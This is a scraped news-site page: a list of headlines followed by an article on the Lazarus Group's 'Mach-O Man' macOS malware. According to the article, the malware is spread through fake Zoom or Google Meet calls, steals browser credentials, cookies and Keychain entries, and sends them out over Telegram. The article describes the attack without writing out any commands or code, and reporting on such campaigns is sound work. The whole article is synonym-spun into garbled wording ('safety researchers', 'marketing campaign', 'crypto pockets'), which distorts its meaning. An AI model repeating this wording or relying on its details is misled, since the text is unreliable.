Lazarus Group Malware Targets Crypto, Business Execs via macOS

Lazarus Group Malware Targets Crypto, Business Execs via macOS

April 22, 2026
Trump has not set a timeline for the extension of the ceasefire – report

Trump has not set a timeline for the extension of the ceasefire – report

April 22, 2026
Join Our Livestream: Musk v. Altman and the Future of OpenAI

Join Our Livestream: Musk v. Altman and the Future of OpenAI

April 22, 2026
Tech giants surge as semiconductors lead a bullish wave

Tech giants surge as semiconductors lead a bullish wave

April 22, 2026
Bitcoin Price Surges to $77,500 High as Trump Ceasefire Extension Lifts Market

Bitcoin Price Surges to $77,500 High as Trump Ceasefire Extension Lifts Market

April 22, 2026
One Of The Best Benefits Of Wealth: Buying Peace And Quiet

One Of The Best Benefits Of Wealth: Buying Peace And Quiet

April 22, 2026
Strategy Jumps 9%, Marathon Digital Rises 6% on Fresh Bitcoin Breakout

Strategy Jumps 9%, Marathon Digital Rises 6% on Fresh Bitcoin Breakout

April 22, 2026
Soft Manager – Trading Ideas – 5 August 2025

STOP! Backtests Lie. How to Make Any EA Look “Perfect” in 5 Seconds – Other – 22 April 2026

April 22, 2026
Stocks making the biggest moves after hours: ADBE, UAL, COF

Stocks making the biggest moves after hours: ADBE, UAL, COF

April 22, 2026
The Indian Rupee stalls around record lows as the EU and India sign a historic trade deal

Indian Rupee stays under pressure amid US-Iran tensions; indefinite ceasefire could help

April 22, 2026
Crypto Firms Report Flood of AI-Driven Bug Bounty Submissions

Crypto Firms Report Flood of AI-Driven Bug Bounty Submissions

April 22, 2026
Why TVs look bright and vibrant in stores, but dull in your living room – and how to fix it

Why TVs look bright and vibrant in stores, but dull in your living room – and how to fix it

April 22, 2026
LG G6 vs. LG G5: I compared the latest OLED TV models, and it’s a surprisingly tough choice

LG G6 vs. LG G5: I compared the latest OLED TV models, and it’s a surprisingly tough choice

April 22, 2026
Wednesday, April 22, 2026
No Result
View All Result
No Result
View All Result

Lazarus Group Malware Targets Crypto, Business Execs via macOS

by Investor News Today
April 22, 2026
in Cryptocurrency
0
Lazarus Group Malware Targets Crypto, Business Execs via macOS
491
SHARES
1.4k
VIEWS
Share on FacebookShare on Twitter


Safety researchers have linked a brand new macOS malware marketing campaign to the Lazarus Group, the North Korea-linked hacking operation behind among the crypto trade’s largest thefts.

Flagged on Tuesday, the brand new “Mach-O Man” malware package is distributed by way of “ClickFix” social engineering schemes throughout conventional companies and crypto firms, in keeping with Mauro Eldritch, offensive safety professional and founding father of risk intelligence firm BCA Ltd.

Victims are lured right into a faux Zoom or Google Meet name the place they’re prompted to execute instructions that obtain the malware within the background, permitting attackers to bypass conventional controls with out detection to achieve entry to credentials and company techniques, the safety researcher mentioned in a Tuesday report.

Researchers mentioned the marketing campaign can result in account takeovers, unauthorized infrastructure entry, monetary losses and the publicity of vital information, underscoring how Lazarus continues to develop its focusing on past crypto-native firms.

The Lazarus Group is the principle suspect in among the largest-ever cryptocurrency hacks, together with the $1.4 billion hack of Bybit change in 2025, the trade’s largest up to now. 

Faux Mach-O Man Equipment apps. Supply: ANY.RUN

“Mach-o Man” package seeks to implement hidden stealer malware

The ultimate stage of the marketing campaign is a stealer designed to extract browser extension information, saved browser credentials, cookies, macOS Keychain entries and different delicate data from contaminated gadgets.

Closing staging director for Stealer malware. Supply: Any.run

After assortment, the info is archived into a zipper file and exfiltrated by Telegram to the attackers. Lastly, the malware’s self-deletion script removes your complete package utilizing the system’s rm command, which bypasses person affirmation and permissions when eradicating recordsdata.

The novel malware package was reconstructed by the safety professional by cloud-based malware sandbox Any.run’s macOS evaluation capabilities.

Associated: CZ sounds alarm as ‘SEAL’ team uncovers 60 fake IT workers linked to North Korea

Earlier in April, North Korean hackers used AI-enabled social engineering schemes to steal about $100,000 value of funds from crypto pockets Zerion, after getting access to some workforce members’ logged-in periods, credentials and the corporate’s non-public keys, Cointelegraph reported on April 15. 

Journal: 53 DeFi projects infiltrated, 50M NEO tokens could be ‘given back’: Asia Express